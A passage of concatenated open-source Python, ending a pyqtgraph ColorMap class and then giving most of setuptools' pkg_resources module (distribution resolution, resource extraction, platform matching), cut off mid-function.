self.stopsCache[mode] = (self.pos, color)
return self.stopsCache[mode]
def getLookupTable(self, start=0.0, stop=1.0, nPts=512, alpha=None, mode='byte'):
"""
Return an RGB(A) lookup table (ndarray).
=============== =============================================================================
**Arguments:**
start The starting value in the lookup table (default=0.0)
stop The final value in the lookup table (default=1.0)
nPts The number of points in the returned lookup table.
alpha True, False, or None - Specifies whether or not alpha values are included
in the table. If alpha is None, it will be automatically determined.
mode Determines return type: 'byte' (0-255), 'float' (0.0-1.0), or 'qcolor'.
See :func:`map() <pyqtgraph.ColorMap.map>`.
=============== =============================================================================
"""
if isinstance(mode, basestring):
mode = self.enumMap[mode.lower()]
if alpha is None:
alpha = self.usesAlpha()
x = np.linspace(start, stop, nPts)
table = self.map(x, mode)
if not alpha:
return table[:,:3]
else:
return table
def usesAlpha(self):
"""Return True if any stops have an alpha < 255"""
max = 1.0 if self.color.dtype.kind == 'f' else 255
return np.any(self.color[:,3] != max)
def isMapTrivial(self):
"""
Return True if the gradient has exactly two stops in it: black at 0.0 and white at 1.0.
"""
if len(self.pos) != 2:
return False
if self.pos[0] != 0.0 or self.pos[1] != 1.0:
return False
if self.color.dtype.kind == 'f':
return np.all(self.color == np.array([[0.,0.,0.,1.], [1.,1.,1.,1.]]))
else:
return np.all(self.color == np.array([[0,0,0,255], [255,255,255,255]]))
def __repr__(self):
pos = repr(self.pos).replace('\n', '')
color = repr(self.color).replace('\n', '')
return "ColorMap(%s, %s)" % (pos, color)
| mit |
alexus37/AugmentedRealityChess | pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/pkg_resources.py | 134 | 99605 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
import sys
import os
import time
import re
import imp
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
from pkgutil import get_importer
try:
from urlparse import urlparse, urlunparse
except ImportError:
from urllib.parse import urlparse, urlunparse
try:
frozenset
except NameError:
from sets import ImmutableSet as frozenset
try:
basestring
next = lambda o: o.next()
from cStringIO import StringIO as BytesIO
except NameError:
basestring = str
from io import BytesIO
def execfile(fn, globs=None, locs=None):
if globs is None:
globs = globals()
if locs is None:
locs = globs
exec(compile(open(fn).read(), fn, 'exec'), globs, locs)
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
try:
import parser
except ImportError:
pass
def _bypass_ensure_directory(name, mode=0x1FF): # 0777
# Sandbox-bypassing version of ensure_directory()
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(name)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, mode)
_state_vars = {}
def _declare_state(vartype, **kw):
g = globals()
for name, val in kw.items():
g[name] = val
_state_vars[name] = vartype
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_'+v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_'+_state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
pass # not Mac OS X
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info', 'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError','VersionConflict','DistributionNotFound','UnknownExtra',
'ExtractionError',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""An already-installed version conflicts with the requested version"""
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq,Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
import platform
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
import plistlib
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC':'ppc', 'Power_Macintosh':'ppc'}.get(machine,machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
get_platform = get_build_platform # XXX backward compat
def compatible_platforms(provided,required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
return True # easy case
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
#import warnings
#warnings.warn("Mac eggs should be rebuilt to "
# "use the macosx designation instead of darwin.",
# category=DeprecationWarning)
return True
return False # egg isn't macosx or legacy darwin
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
run_main = run_script # backward compatibility
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist,basestring): dist = Requirement.parse(dist)
if isinstance(dist,Requirement): dist = get_provider(dist)
if not isinstance(dist,Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self,dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
raise VersionConflict(dist,req) # XXX add more info
else:
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if not replace and dist.key in self.by_key:
return # ignore hidden distros
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
requirements = list(requirements)[::-1] # set up the stack
processed = {} # set of processed requirements
best = {} # key -> dist
to_activate = []
while requirements:
req = requirements.pop(0) # process dependencies breadth-first
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
#msg = ("The '%s' distribution was not found on this "
# "system, and is required by this application.")
#raise DistributionNotFound(msg % req)
# unfortunately, zc.buildout uses a str(err)
# to get the name of the distribution here..
raise DistributionNotFound(req)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
raise VersionConflict(dist,req) # XXX put more info here
requirements.extend(dist.requires(req.extras)[::-1])
processed[req] = True
return to_activate # return list of distros to activate
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
map(working_set.add, distributions) # add plugins+libs to sys.path
print 'Could not load', errors # display errors
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
plugin_projects.sort() # scan project names in alphabetic order
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
list(map(shadow_set.add, self)) # put all our entries in shadow_set
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError:
v = sys.exc_info()[1]
error_info[dist] = v # save error info
if fallback:
continue # try the next older version of project
else:
break # give up on this project, keep going
else:
list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
self.by_key = by_key.copy()
self.callbacks = callbacks[:]
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(), python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self._cache = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version==self.python) \
and compatible_platforms(dist.platform,self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self,project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
"""
try:
return self._cache[project_name]
except KeyError:
project_name = project_name.lower()
if project_name not in self._distmap:
return []
if project_name not in self._cache:
dists = self._cache[project_name] = self._distmap[project_name]
_sort_dists(dists)
return self._cache[project_name]
def add(self,dist):
"""Add `dist` if we ``can_add()`` it and it isn't already added"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key,[])
if dist not in dists:
dists.append(dist)
if dist.key in self._cache:
_sort_dists(self._cache[dist.key])
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
return self.obtain(req, installer) # try and download/install
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]: yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other,Distribution):
self.add(other)
elif isinstance(other,Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
AvailableDistributions = Environment # XXX backward compatibility
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0x16D) & 0xFFF # 0555, 07777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
app_data = 'Application Data' # XXX this may be locale-specific!
app_homes = [
(('APPDATA',), None), # best option, should be locale-safe
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
(('WINDIR',), app_data), # 95/98/ME
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname,subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""Convert an arbitrary string to a standard version string
Spaces become dots, and all other non-alphanumeric characters become
dashes, with runs of multiple dashes condensed to a single dash.
"""
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
class MarkerEvaluation(object):
values = {
'os_name': lambda: os.name,
'sys_platform': lambda: sys.platform,
'python_full_version': lambda: sys.version.split()[0],
'python_version': lambda:'%s.%s' % (sys.version_info[0], sys.version_info[1]),
'platform_version': platform.version,
'platform_machine': platform.machine,
'python_implementation': platform.python_implementation,
}
@classmethod
def is_invalid_marker(cls, text):
"""
Validate text as a PEP 426 environment marker; return an exception
if invalid or False otherwise.
"""
try:
cls.evaluate_marker(text)
except SyntaxError:
return cls.normalize_exception(sys.exc_info()[1])
return False
@staticmethod
def normalize_exception(exc):
"""
Given a SyntaxError from a marker evaluation, normalize the error message:
- Remove indications of filename and line number.
- Replace platform-specific error messages with standard error messages.
"""
subs = {
'unexpected EOF while parsing': 'invalid syntax',
'parenthesis is never closed': 'invalid syntax',
}
exc.filename = None
exc.lineno = None
exc.msg = subs.get(exc.msg, exc.msg)
return exc
@classmethod
def and_test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
return functools.reduce(operator.and_, [cls.interpret(nodelist[i]) for i in range(1,len(nodelist),2)])
@classmethod
def test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
return functools.reduce(operator.or_, [cls.interpret(nodelist[i]) for i in range(1,len(nodelist),2)])
@classmethod
def atom(cls, nodelist):
t = nodelist[1][0]
if t == token.LPAR:
if nodelist[2][0] == token.RPAR:
raise SyntaxError("Empty parentheses")
return cls.interpret(nodelist[2])
raise SyntaxError("Language feature not supported in environment markers")
@classmethod
def comparison(cls, nodelist):
if len(nodelist)>4:
raise SyntaxError("Chained comparison not allowed in environment markers")
comp = nodelist[2][1]
cop = comp[1]
if comp[0] == token.NAME:
if len(nodelist[2]) == 3:
if cop == 'not':
cop = 'not in'
else:
cop = 'is not'
try:
cop = cls.get_op(cop)
except KeyError:
